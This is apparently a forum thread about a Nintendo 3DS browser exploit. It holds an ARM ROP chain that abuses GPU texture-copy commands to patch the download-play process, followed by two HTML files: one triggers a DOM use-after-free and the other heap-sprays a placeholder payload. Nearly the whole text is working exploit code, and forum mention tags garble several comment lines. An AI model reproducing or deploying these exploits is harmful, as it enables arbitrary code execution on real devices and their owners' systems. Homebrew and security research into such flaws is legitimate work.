.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057E0 @ r10 (needed for rop) InitData 3
.word 0x001057E0 @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057E0 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x0013038C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
how do i host this ln my own website server so i dont have to go to loadcode.projectpokemon.org?
All thats needed for this is a frame and index.html?... thats simple. Where can i get these Files?Do you mean via your computer or on an external server? If you don't know how to port forward, I suggest 00webhost. You can upload the index and frame .HTMLs to the server, and test it as you please.
All thats needed for this is a frame and index.html?... thats simple. Where can i get these Files?
<html>
<head>
<script>
var nb = 0;
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
window.onload = documentLoaded;
</script>
</head>
<body>
KEKEKEKEK...
</body>
</html>
<html>
<head>
<style>
body {
color:white;
background:black;
}
</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
mem.push(t);
}
function dsm(evnt) {
var mem = [];
for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("YOUR PAYLOAD HERE"));
}
}
</script>
</head>
<body>
<h1 align="center">LOADING ROP...</h1>
<iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>